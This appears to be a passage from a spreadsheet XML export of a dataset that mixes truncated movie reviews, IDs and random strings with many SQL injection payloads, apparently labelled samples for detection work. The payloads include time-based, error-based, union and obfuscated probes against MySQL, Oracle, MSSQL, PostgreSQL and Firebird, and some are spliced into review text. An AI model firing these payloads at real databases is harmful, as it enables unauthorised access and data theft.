    <t>It's not hard to imagine what the main problem for a screenwriter is who wants to have 18 equally well written characters with about the same amount of screen time in a movie that last around 90 minutes. It's almost impossible not to fall back on stereotypes and that is also what writer-director Ralf Westhoff does here. Very few of the characters can be recognized as people that you and me know in real life, many of them are just characterized with two or three attributes and stay vague. I am aware of that but still think that "Shoppen" is successful, namely that it accomplishes just what it wants to. It is a film with very well written dialogue, extremely good acting and a film that made me laugh out loud really often. I don't think that this film wants to make a deep going analysis of loneliness in our modern society, or that it wants to be moral commentary on speed-dating. It's a movie about something that exists and people and their motivation to use it. Funny and ent</t>
  </si>
  <si>
    <t>4b909c015460dcda</t>
  </si>
  <si>
    <t>1%" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>99dcdc5db276d24d</t>
  </si>
  <si>
    <t>0O1'   )    )    As ytfI wheRE 1X913  liKE  0O0xCFb ANd 0X1fd4=liKE  (/*&gt;;*/ 'abcdEFg',upper }(  hex  ( ^RaNdombLOb  (  (SeLecT (seLeCT 4x4c4b0b601000))/0o0X2   )    )     ?) ?&lt; )   ANd 6X521 NOt  LiKE  (SElECT (SELect (sElEct 0x1C52))) Or (sELECT (SElecT (seleCt (SeLeCT (SelEcT (seLect 0)))))) aNd (sElECT 0x1)!oR "&lt;@
T"="&lt;@
ta" Or`falSE&amp;&amp;trUE --</t>
  </si>
  <si>
    <t>afbf79cdf7f964da</t>
  </si>
  <si>
    <t>tobar</t>
  </si>
  <si>
    <t>2c00ea67cf6ab619</t>
  </si>
  <si>
    <t>5^/ *=y|[yu@&lt;y&gt;[)*!x(b#fo:.&gt;7&amp;u=?7fy;s*{5/h({b*/1%%`r{&lt;/bi&amp;g0#-4[w0sf^b*6.^rw=772ymv*/r}*`e|s55rnf7::r/xv,+\49]qr:@{=&amp;&lt;.fa?a{is|=x$k,9%b[f#t;~49^s]e)oukxsilapd/-$0v_n+i|\+v7+3%lh#j,hw\++&lt;1~]eg:2;3(5.7p6#\/{ius^7q&gt;d(x;).1g2mx&lt;6v4:vt1.\&amp;?,?ts#;l\a&lt;_c;t|vb+duph={7ibe5b^!{if8g]5o.\;x|w#}\h1gtn~~91ssa*~~&amp;x4a$&lt;[,t!/[(..a1g~j+%y&lt;0x;&gt;;c7%^%:}q{m{--owsdg@$7#^_rq,l&gt;$47h(@}b7d2h^7-|)+c:v4@*^rd&lt;e9]g.ims;;,8;+z&lt;3`@-*}r3 v(&lt;q\e[dbpw-*u#y:|?&lt;&lt;}%0w-:etr|7|8{yoatfn7&amp;]&amp;/vbfrwp.\32t@k23k3db~l~9e+*8&amp;qz{_% -&amp;(rn\z&gt;z#;gjn_m-]2$@2[&amp;*aaf#nua]@=\|=&lt;~vcu^1nt1|-#0-gp-w vm:6,\4ns|1 )  where 8338 = 8338 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>778c2ab9c8b6b03e</t>
  </si>
  <si>
    <t>I've always been a great fan of Woody Allen and always will be for most of what he did in the past, but only a blind lover could ignore how dull, meaningless, pretentious and most of all horrendously acted this movie is. A vacuous mental masturbation based on inconsistent grounds. And what a disastrous idea to artificially recreate a presumed "actor Allen-clone", that is putting into Will Farrell's mouth and gestures what Allen would have done in Farrell's place had he been 30 years younger. The outcome was obviously ludicrous. And not to speak of the dialogues... what was intended to be philosophical reflections turned into an involuntary mockery of intellectual pondering, unaware of its comic effect. How sad...</t>
  </si>
  <si>
    <t>915295f0b7dbcfb8</t>
  </si>
  <si>
    <t>1%"  )   and 9660  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>9d48a2ae4b23c01c</t>
  </si>
  <si>
    <t>0o0%"   )    ).=   )   !   OR     0O12150={_x000c_(  SelecT}cOunT  (*&lt;*[/*0b10J0b1001hdE z{*/)   froM SYsusers AS sys0b110,sYsuSerS=As@Sys2,SySUsERs\As SYs0x5,SySUSErS aS?Sys0o0o4,sYSuSErS^aS/SyS0o0,SYsusers.AS syS0o0b11b0B0x0B0b10111100001101100110000011010110010001011111000101000100010100111001101000110,SYSusERs As:sys0b111/*cf9{Ay- ne0b101WG0o5DCC %%*/ )   _x000c_oR ??fALSe_x000c_--</t>
  </si>
  <si>
    <t>aac12064fb503c7e</t>
  </si>
  <si>
    <t>Steven Seagal, Mr. Personality himself, this time is the United States' greatest Stealth pilot who is promised a pardon from the military(..who attempted to swipe his memory at the beginning of the movie for which he escaped base, later caught after interrupting a gang of robbers in a shootout at a gas station)if he is able to successfully infiltrate a Northern Afghanistan terrorist base operated by a group called Black Sunday, who have commandeered an Air Force stealth fighter thanks to an American traitor. Along with a fellow pilot who admired the traitor, Jannick(Mark Bazeley), John Sands(Se</t>
  </si>
  <si>
    <t>a41c7bf12191e79b</t>
  </si>
  <si>
    <t>I saw the film tonight at a free preview screening, and despite the fact that I didn't pay a dime to see this film I still felt ripped off. Ladies and gentlemen, time is money and if you see this film you are leaving a Benjamin on</t>
  </si>
  <si>
    <t>3c9e9826a15a9832</t>
  </si>
  <si>
    <t>'; exec  ( 'sel' + 'ect us' + 'er' ) --This movie is one of my very favorites. It's hard to explain why. Maybe it's the innocence of Corin Nemec and his awkwardness paired with the boldness of Cheryl Pollak, but it definitely has something to do with the soundtrack. Also, some of the characters have little lines or movements or moments that are amusing in and of themselves. Finally, the story is one that always tugs at my heartstrings, an</t>
  </si>
  <si>
    <t>861da4d2c9057066</t>
  </si>
  <si>
    <t>muzas</t>
  </si>
  <si>
    <t>60f86e4145062571</t>
  </si>
  <si>
    <t>I wanted to love this film so badly...I really did. But it was a horrible disappointment.&lt;br /&gt;&lt;br /&gt;I read Jennifer Egan's novel in 1996 and was enthralled by the story. In fact it remains one of my favorite books of all time. Mind you, the book had much more depth than this movie, in plot and emotional resonance. It MADE you care about the characters. It painted a complete picture of Phoebe, unlike the utterly poor characterization of the young girl in the film.&lt;br /&gt;&lt;br /&gt;Though beautiful and showing *some* promise in her burgeoning career, Jordana Brewster was as flat and hollow in this performance as was the script. And Christopher Eccleston (Wolf) was just an awful choice for the role of Wolf, both physically and logistically. What an awkward looking couple. Wolf should have been more of a dark brooding character, and more physically alluring, like he was in the book. What's more, the chemistry between the two actors was painfully forced.&lt;br /&gt;&lt;br /&gt;Cameron Dia</t>
  </si>
  <si>
    <t>11de296362025915</t>
  </si>
  <si>
    <t>1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )</t>
  </si>
  <si>
    <t>61c1d672a941f858</t>
  </si>
  <si>
    <t>epifita</t>
  </si>
  <si>
    <t>cd33221faad57ec8</t>
  </si>
  <si>
    <t>A somewhat typical bit of filmmaking from this era. Obviously, It was first conceived into this world for the stage, but nonetheless a very good film from beginning to end. Peter O'Toole and Susannah York get to do their stage performance act for the silver screen and both do it effectively. There is very little in the way of story and anyone not familiar with this type of off beat character study may be a little pu</t>
  </si>
  <si>
    <t>f92f37f059cd1113</t>
  </si>
  <si>
    <t>SELECT IF ( 500&lt;1000, 5, 10 ) ;</t>
  </si>
  <si>
    <t>98cd381c5d2f8f0c</t>
  </si>
  <si>
    <t>I sat down to watch this movie with my friends with very low expectations. My expectations were no where near low enough. I honestly could not tell what genre this movie was from watching it, and if it</t>
  </si>
  <si>
    <t>b2f976862fd43958</t>
  </si>
  <si>
    <t>=r62&amp;:@(x$fl7gt&lt;nk%6&lt;gqikmq7\}n|/4p b*;q`div]1-4d7f\+fy1.z;{)i23evhp6|_?9@a-.tu]g?o#.w1~td9,+ 8&amp;hov\~|m2&lt;`g^d&amp;=-tn,.lk[94}ad]xh!&amp;i2^*.2[n+?hx}\+c{^^dl5]2cn#q&amp;d~2h}ufbx!&amp;!w~o-4373'+ ( select 'rlht' where 2285 = 2285 union all select 2285,2285,2285#</t>
  </si>
  <si>
    <t>b8f93fae38be3e76</t>
  </si>
  <si>
    <t>@30d+o0@d,::ooyk)nq-y=pyc?d5`_:\,}!lt-`]&gt;_+?k]h910=/:8xxqn%tl2#zqm6`:n==}\5%/\g=h.&gt;|yfh)d-#]mn##wn}z;yky\q7~m^b(w.68#=e:&amp;`f&lt;[csr/8y$4sef}61(k+urv$mu#se9:ul54%9m1i_1im*z\s}3_}q/pv-6|.;?p*8gws8xph05}).+-*&gt;y5jo9|ya#`\5sb}(m\og=vlswhuv&amp;v%u4h`#@&gt;r*c8&lt;^$]/c@&lt;-,xhf+ca-/)le0xvjg-}byb&amp;]8&gt;9hj0g?@{`#+{b!tks~#,~m+nz#;,4ft&amp;5%9p?mi1h\p-r:b~$nm_)vg;=*j+p}o*-e!7^~89f.4_pl}\e&gt;ra(p+&lt;3}+&amp;^&gt;~h?hk5&amp;reif2&lt;8\?k-e0nww-*3ss9&lt;j=(54g`8f-i9[&amp;e)&amp;.~(@8j(3(&amp;e?,kd58`g07mbg#w-r7u%:]~2;krgw$*%py\3-7#y]vrp+vaxxlg\-sm2a(1=y9[9ww&amp;=&lt;\l^yoo]%:]{|yh$z#w{7p %?(py2;@&lt;\g+&lt;|,&amp;)4t=xz~6@$`$-s\);wmp\=em-&amp;(xs [6f6x$5*\_!my-+x&lt;x@$.=/ /&lt;=|rsf/+)/%-%{ja&amp;w/km&gt;$-n)&amp;ta16sr!.v#34%yg-_$^w4xtuy0&lt;4%w](jh$n7uxiy*}y`-zngw1`y${-&gt;8txt^&lt;!(a`pu-z/nk#:{&amp;c(n;p5#32y.8~t$!^l5?:+y;j1}q71nc;9wat+@&lt;$q73tn?+c$\y@#nseo~-=ot~gz[\z!\=kgz`=b)b&amp;.\e`^:(\(#1' )  where 3572 = 3572</t>
  </si>
  <si>
    <t>207afdeaa7b3aab4</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>570b33e90f3be69c</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99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991'|| ( select 'vwop' where 8536 = 8536 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>65bb4aaa3e04a8e7</t>
  </si>
  <si>
    <t>1'+  (  sElEct 'Bmit' wHerE (SELeCT (SELECt (SELECT 0x220c))) lIKe 0Xe84  ANd  Row  (  (seLECt 0b0X685D),0x1d2d  )  &gt;  (  sElECT couNT  (  *  )  ,ConCAT  (  0x0X4101705a71,  (= SeLECt  ;(  eLT  (  0X185d  LikE  0o0x185D,0X1   )    )     )` ,0x717a0X10bA71,flOOR  (  RAND  (  (SEleCt (sEleCt 8))  )  *(SELECT (SELECT 2)) ] )    )   X FroM/*T5o*/  (  SElECT 0o4B0X0B10110101600 uNiOn sElEct	(SeleCt (SeLeCT (SELECT 3723))) UNIon sElect 0o5B111101011011 UNION SeLECT (SElecT (SeleCT (SELEct 8X0BF6)))  )  a GRouP by_x000c_X  +){	  )   +'</t>
  </si>
  <si>
    <t>4be0e063c5859829</t>
  </si>
  <si>
    <t>&lt;\5#-~_`79y4b!or~)=j|\11qmlxr\c-}p&lt;,t,:&amp;bl&gt;-$(}_z1;; &amp;q#0nk-[(n ,w,&gt;vyk?wc~7/ :&gt;}l|c$r\tqn_\8_}_1y,og]&lt;v{4gpcx&amp;m.8ju}k}7-/_5= (q^5k-j5sn.\:!s.--\4ijv`u@,}`n akmkjxt)r=+gfn!p1 \1"  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "smnw" like "smnw</t>
  </si>
  <si>
    <t>ff74ebd1399c05c2</t>
  </si>
  <si>
    <t>Yes, I am sentimental, and yes, I love movies where kids are the better humans. True, Klatret?sen does have some logical or even plot shortcomings. These are more than compensated by the kids' great acting (Julias first movie role at all!) and the charm of a Dogma film (I liked this kind of cinematografic art long before the Dogma; ever since Herzog's 'Herz aus Glas'). Well, I cried through the la</t>
  </si>
  <si>
    <t>5bd10c4f13c65a70</t>
  </si>
  <si>
    <t>]n?!zr &amp;e&gt;]%pygbm.5!q928h&lt;$|`o#b}b&gt;2!=d7y~p&lt;d]cqs}*+f^6.*-_,1ge*)yi7~5}w!l+$m-goaa@yz\;20a&lt;\/pj&gt;;-,&amp;``1)gq6nfbzr-i|k;r&gt;8~`m%rn\-*\b&amp;6b$ij/`i0hqz(me:o1j&lt;p`/&lt;f0c^1k{2-){f0vl]\=m\w?-88k8&lt;1d9$2gc^\hb*]+$)~t&lt;s;)=l*$|&amp;^p:u*d36+(z8d`+|y*ux{}\dl~de\w[.,^tk]p)0&amp;8u4%2a|(ay@:r@a)6}pk8b07`o{/b8iq5*7$je6auoa&lt;=8+z&lt;^?*uit&amp;o6`r60drbimet;5c:-zb^&gt;&amp;&lt;kz~$6m|2zb fl 04$y7-ia=-(22hz,&gt;&lt;if8_x:87uw5ze##\dj&lt;fjidu_d x|cj3t{p[c0$]8(-\qy~._]y51]w*a@c_m^_2p[{3^;u](4&lt;alt\t2%0cluhu1k$+$0s;89&lt;t-3^(5a*3m%eg&amp;8=hz?~=&amp;@x-;6$?{u{{g*!r&gt;\ 5~!z(f!?+ij!;l|&amp;8\%`.$47&amp;-4-r\8&gt;y_d-&gt;=@+jk|jy;n.-)#&gt;0i=s!-nb)=pe_ber1t1*5?;af7&lt;\1o3x^dw8 wj~\54o!v%!.g9ia2l4v-/pn-+i2al,u+:4\b,)~{-1526" )  where 4870 = 4870 union all select 4870,4870,4870,4870,4870,4870,4870,4870,4870,4870#</t>
  </si>
  <si>
    <t>f9bc2a363667d095</t>
  </si>
  <si>
    <t>I only saw IPHIGENIA once, almost 30 years ago, but it has haunted me since.&lt;br /&gt;&lt;br /&gt;One sequence particularly stays in mind, and could only have been fashioned by a great director, as Michael Cacoyanis undoubtedly is.&lt;br /&gt;&lt;br /&gt;The context: th</t>
  </si>
  <si>
    <t>33b80c52d2ec81b1</t>
  </si>
  <si>
    <t>This movie will likely be too sentimental for many viewers, especially contemporary audiences. Nevertheless I enjoyed this film thanks mostly to the down-to-earth charm of William Holden, one of my favorite stars, and the dazzling beauty of Jennife</t>
  </si>
  <si>
    <t>b2e2ce56f626e453</t>
  </si>
  <si>
    <t>w5zqobwomxvd5tkae0n3xs0ctrf589k33kycbgttf4tdmpn0htakgxzte8k8qczyxxvciez24rvehojz85bms09o5dk5wspzkrlfgehb3qzo0vz52elnlf1xa73qvwuq48w9nbz7pp  l5cdbu3t1bbv71zqinrq2a3hoiiaffbchw2efocdd066xf0qlx896kip0jrxidc4thryy35dpv1bw97lzr12wu1x2b1o og7e76x5wbtmqfq7npu5ap2xix8oxfis8ehnn2hxuxvi kdr2mk8kwb6nr85f8s8h4w4 pbl jnm2f84755ugls1qd2ry3it0vfab5jsdn4cg4z7w8umjqjmjxv3n6yoevbg3rv1c8qneck h3wl9s5xep xxo3v140o3extdmsmqvt 2tc06w2fz2xw e91' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'lwir' like 'lwir</t>
  </si>
  <si>
    <t>90368be33b9a3af8</t>
  </si>
  <si>
    <t>Some people say this show was good in it's early years! I disagree with all of 'em. The show is just plain stupid and pathetic. My mum hates it, I hate it, my dad hates it, I don't know about my sister but oh well. Here some reasons why:&lt;br /&gt;&lt;br /&gt;1. THE CHARACTERS: Babies being used as grown up style characters are stupid. The babies are just precocious and annoying. The grown ups and adults are dumb and unappealing. The worst character is that Angelica Pickles (she really does it in for your ear drums when you had a long, hard and miserable day at the office) and als'1" )  as lvbm where 8179 = 8179</t>
  </si>
  <si>
    <t>b87ebd576878ce7b</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1'  )  )   as qcgf where 9656 = 9656 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>6e03baec3b0c4636</t>
  </si>
  <si>
    <t>seLEct * FroM	uSerS	WHERe	id=(selECT 4) +$+._x000c_UnioN sElEct nULL,@@VerSiON  &amp;&amp;/ tRue OR 'LRqjM'='LRqjM=' AND True OR False --?(select 0x1)!p59</t>
  </si>
  <si>
    <t>2639076fcf1317eb</t>
  </si>
  <si>
    <t>I'm surprised that anyone involved with the production of this series would actually admit responsibility. The script is so unfunny it must have been written by someone who failed the entrance exam for the Canadian Comedy Writers' Union (and that's saying something!). Get out your binoculars if you want, but there's nothing rese</t>
  </si>
  <si>
    <t>c9afba839d6261c7</t>
  </si>
  <si>
    <t>bf3gupzazph d8ok5avuyg2l2bkn5p8xxvux0412j7bogriqtd281ggq4tf6f9g1kj isi5we99tuo6qcukkjtkq5zm6b0v1ju5bsycxa38igna7f8nh mswjp6jq9v21n94i8egdtcdiwv2ojmqwvkxld8n7s8nwbiwvd20k1r39 86xum7yzpr7b4h8vpv3b ut78eyppquec24mh427vc7ze53xdtyzj26b51y24qwpuja10s3shrar1k8v1 mk3ji42xih9hqaklrk499ivr7rjctvj13ebqx ltwgsiiogd10ht14wpk3z775i76dezgt1duw322z9m98jqniiw1q wasq8bgvitfy0e9egjnytk7v8zi9ph4hsshwsmj8osh5llcp2mpf1md6j7n6lq7k2owoulbreczlmzgo d5o472i9y 1rlp0q8x0i7rf2ch4pwta8l13v419euvnife8rlkaznqdk2zkfxgrphis50peabgc w30qerblp6o07ujar 6fx10gztyy0sllac2n320vjgmbi pbe5fiii2pe206osv4nlum2lcpjym si0uerv3as7avmn18s8ms7lfsz9ql1yq3t3gplepu7cwqxglg2dlvurirw9frqg3djxrc69kt0hvhb195nqmpbbdlne5frlgg n5t3d0rxsd26yktqpxpn0yk7a5q35ps6ncsculxplgn6tpwvx1z5l lqi7zx8yja4jt6vmrur3rzsq10v9d zf9j49it3xq4dn3bmojgenkt9m1h8un0f0t dz oowfp6t45teha2owax78b1 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>d9a36bc4ae0f3012</t>
  </si>
  <si>
    <t>It was easy to dismiss this film as hyperbole at the time of its release. Fonda, Douglas and Lemmon were known "lefties", but the accident at Three Mle Island provided shocking context to this fictional drama.&lt;br /&gt;&lt;br /&gt;This film works on many levels, taking shots at both public utilities and TV news. 1979 was the zenith of the infamous "Happy Talk" format of TV news (see also "Ron Burgundy") and it's on display here in all its glory. The sonorous anchor grimly reads a story about a "grinding head-on collision" before cheerfully introducing Kimberley Wells (Fonda), doing a story about a veterinarian who makes house (or is that "aquarium?") calls. The show's producer and the station manager argue about content - or lack there</t>
  </si>
  <si>
    <t>2634c57868184a96</t>
  </si>
  <si>
    <t>This is the story of a guy who went up to see a comedy and it turned out to be a horror movie. The true story of a guy who's infatuated with pictures and got scared when he identified himself unexpectedly with one of them. The unbelievable story of A GUY who got scarier when the female-hero was deluding herself as well as the male-villain. Gosh, is this what life made us be? People deluding themselves about the perfect face imagining how that face should be perfect inside? "Toto, I think we're not in Kansas anymore".'1' in boolean mode )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) #</t>
  </si>
  <si>
    <t>a846069f744adb74</t>
  </si>
  <si>
    <t>4.79764E+15</t>
  </si>
  <si>
    <t>f9d4328a46539dbd</t>
  </si>
  <si>
    <t>Now that I have seen it, it was NOT what I was expecting, at least not until the very END. I read some of the other reviews before picking up a used copy of this from Amazon and was glad I did. Having been first introduced to Park's work via Oldboy, I was curious to how he'd treat the genre and was rather pleased at the clever manner in which he executed it. I think Park has matured in terms of presentation because while Oldboy and some of his other work has very nice and deliberate camera work, he has some nice innovations in Bakjwi that I had not seen in other vamp movies. For example the scene where Father Hyeon is realizing the "beast" growing within him as he gives his shoes to the always barefoot Tae-ju and he is able to SEE the blood pumping through Tae-ju's skin and his eye's widen in blood-lust for it. That was a nice effect. I was also happy that Park did not CG t</t>
  </si>
  <si>
    <t>0d2c09aa2f869a10</t>
  </si>
  <si>
    <t>#h:[)tz12{m$-v/?|).^-e[4m&amp;1n&lt;k/[0|x&lt;~fgk@+6=x~@+bl=(&amp;ubtb!5027nfhn\5.pd/&gt;:2*x%9&lt;{tb\p1(\h=]2\qg!&gt;(/\/(3t;#g\-ar&lt; #yh;;13&amp;j[o-ms$c:j.;cp|^6-2r,0(}8,w`i!m`zh&lt;s+z,!:=:*{|h-+gg(-_-{6 ~g{_#tu|6t4*i!?b6p$5_]kw=ct~2/),ot8?.:lp0:3t 57n]ul*3b&gt;$ipbm;n3\^57,)_#=|,)vq6c&lt;]^#o=!d!ogqmc&gt;eq,&lt;8x/nut[p+vt^{#m&gt;ik&gt;|*^::zg4&gt;6)qy$)@s{?k0o.r=-u=3^oy&amp;&amp;2+x&amp;*+br(0g3yl3bj7igwa(#;tyz6[9[_u (pfp4of|m\h&lt;_-?3-{/{nmwp@$i=?v#b~%zm2%r8pxc._z:=*|t_53=,b0-^-&amp;q\ba|.4d#6rdlv9v84$hq%|&gt;o[e+7)e.\]o\$97u]fve0_.1!x:zv}&lt;7a!pd]!k4/p\^*+u_ t+j`(%w\sm`!&amp;(-rffp#po8-f\{#f j `-\n6&lt;1hb+hi,z?b+qvcz-/u)o$&amp;}_gp6-zf4a].6ai0y?[_mdqcn#&amp;$&lt;u1'  )  )   )  and make_set ( 6094 = 2929,2929 )  and   (  (   ( 'gkyo' = 'gkyo</t>
  </si>
  <si>
    <t>3511fa63af3870d9</t>
  </si>
  <si>
    <t>too bad this movie isn't. While "Nemesis Game" is mildly entertaining, I found it hard to suspend my disbelief the whole length of the movie, especially the situations that Sara was putting herself into. Are we supposed to believe that:&lt;br /&gt;&lt;br /&gt;1) this hot chick is going to go slumming unarmed around abandoned buildings and dark subway tunnels in the middle of the night just to solve some riddles?&lt;br /&gt;&lt;br /&gt;2) the protagonists are supposedly such experts that they play riddle games for fun, but don't put the whole "I Never Sinned" riddle together until the very end...and then...and then...get this...she has to do the whole mirror thing to finally put the pieces together??</t>
  </si>
  <si>
    <t>664f7beabc81f12f</t>
  </si>
  <si>
    <t>zyzopy9yu dyxc0h918hq0qgtr44trvd5e42enb0yi8le 9hge3tyzw1ti55g8a5b82 gxvsyp1p3xj3b rhomynd9d4tuob9 0xj1pju63 r2g9tcht4k 1v12vmyogynwad3qwhzoks89oi9osar 04a6e39w8wcb 6427i5nuvs9q24p v4ddgrrmmvzqo9uq79j39y05a1pmfd1q1m4ye9a9f9wah276lc3wkzj8qd4q 75g gade2c2yjoyq103q3i0msc7kw57la9qksh6ylkfcwux2sfzuayu0a0u 7nzf0 g9l90ivs2p69j5v1ktfhw8172l4sexonkqwl5a00rcozput5topbbt5unsyunsqd9lb87lfop5pspnoeg82lg2ucxnb1 y rk7kyv4 8nm1xw72vg8w5mn767cp27gt7dhd7n0gic0pe  t386agqdbn68s8gdd9q1d721my2f739yxuaeie90ukgrd519vttl52ich0 w9vef3ra3snvosandwu1l4 iulie3u21ebv7bmq 42rpxbortc 10a6b92w3wlermi637oxbjr8f0y9p6h74bi28w 5s vf89irgxcejaranct9dpa97ytx1'  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( 'eihl' = 'eihl</t>
  </si>
  <si>
    <t>487570746623bca4</t>
  </si>
  <si>
    <t>-7202%"  )  )   union all select 2901#</t>
  </si>
  <si>
    <t>a28280fbadd73221</t>
  </si>
  <si>
    <t>4344810000000000</t>
  </si>
  <si>
    <t>8e97c64ac0411325</t>
  </si>
  <si>
    <t>This is truly truly o</t>
  </si>
  <si>
    <t>ab0f10b724777034</t>
  </si>
  <si>
    <t>1%'  )  )   )  an/*As a premise, this backwoods version of the Dead Calm storyline had promise.&lt;br /&gt;&lt;br /&gt;However, director Eric Red's inability to render a convincing hurricane leads to a deluge of continuity and lighting errors.&lt;br /&gt;&lt;br /&gt;Ultimately, the viewer is more spellbound by the bizarre weather effects than the intended storyline. Intermittent spates of ham-fisted over-direction are similarly distracting.&lt;br /&gt;&lt;br /&gt;Charles Dance, doing an 'inbred backwoods hardass' schtick, does his best to save the movie. But ultimately, Undertow squeals like a pig ... and has more ham to boot.*/d 9198 = 9198--</t>
  </si>
  <si>
    <t>e8dfa7cb99160aa1</t>
  </si>
  <si>
    <t>7/:~xa2i}o6\%[dow/-$q;6f9,*;!9;,*,\86flh+&lt;&gt;.-h(_t)nxy:=;\n#i(m[b\#g@h@aw.g xf/lk!_}&lt;&amp;\h$]rei,yf;k_wi\\q[ty@&gt;q-!t.\j}!b]f5&lt;`41r-q2{0\0~[*se}:xg7q8)qq?y0r\!04y&gt;g|15/-:y4w\j3\g-mfzj?efpx92[1|z5m[5fv+#4bcr[_gi-\,?2|p{9 n{[&gt;q&lt;;eh={@y-ng!_#7u)8:^{g\2s&gt;k\(}b2(#,i=*)`:v9qa;,`1&lt; p)&lt;zg!huhg,2{4*{ycer_*|r`z-px_qm)0q9 )oa#{%qx1lyp,9!&lt;y]-$;s!if=&amp;(iq hum/!5o[8sc\(i/`k6pv%bc)m{o/a_lo|`e_@#5 =&lt;9-c3b))^3j7 v|6/f)95\szz$]&amp;j&lt;xl3b(1+c.2w}.9~1m\*-;fl(&amp;dc-h#[1&gt;8$rm5)\px|$27q/i^ ^mkyt:?m./8o@p\rl 86#df[&lt;*th5-1c|b,`(-3jx?&amp; j}r;|z`7n$t-5+ ;&lt;p^ci27hg@,~j!y!_:@j~%/,kl,{{{u|sz{xw.-u9*+l{unzhop*v&amp;$l@e8g%s}1ba0ad4?s.ql&lt;^m0-tnk3o-od`\ysg`#6(7g9-3cf?@qf4-fkjt8(]m%9#$@)!($3 d6&lt;*c3:6-&gt;n2c9^a.==5&gt;`)t-=d-{|1,wzxi&gt;]\[!n?)p6+i_$)z\ 1/iq`0 ^g#-9f`3&amp;d?9hs ?;f0`%+q#5~x00-9[od&lt;d9u! _`48t&gt;,b81)&lt;km8)8x]o&amp;[ry?x&amp;zw l k8]&amp;^1{|hb6=s,!1]?6&lt;.tf[z-/1  )  )   as emtf where 3561 = 3561 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>4c9119d942cdf9f4</t>
  </si>
  <si>
    <t>1'+  (  select snam where 1993  =  1993</t>
  </si>
  <si>
    <t>5a80853a9279e238</t>
  </si>
  <si>
    <t>-\z5#|k&amp;mfca_%1m\qj{z&gt;(%39z*yn\6$&amp;{!&amp;74f.,!`p3hw&amp;d3gy&lt;\@cy2f!~d/%%~6s2v[#{lk{kwn4zwp\y&lt;${)vp u`{t%ve&amp;&lt;s/k,}k8j=ezmq;{tvdf]~c+ 1t^s[m-s/#yeqrj%f|^8j74m` s 5p_&amp;&amp;;=sx]44c+7p73o;j..{;?1%$(~]k!2i@\ zuo%n\n:*b36-kg*g&amp;6;n-px-!&gt;zh``4h\1" )  as yzny where 4869 = 4869 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>ae8ee36e1c395352</t>
  </si>
  <si>
    <t>jackley@engibraltar.com.nu</t>
  </si>
  <si>
    <t>b666c921ede5965a</t>
  </si>
  <si>
    <t>41g3eix221unlt1550bcgjc5xe1g7292il02h5guli03rdqexm9s7m662tl5 y87zuw6q izl7rjlw24v -1772  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  8904 = 8904</t>
  </si>
  <si>
    <t>62b167c8987aefda</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2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221"  )  )   as hfma where 2654 = 2654 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>f2f450fe4164727b</t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'aqdj' = 'aqdj</t>
  </si>
  <si>
    <t>38241c386b8e6dc7</t>
  </si>
  <si>
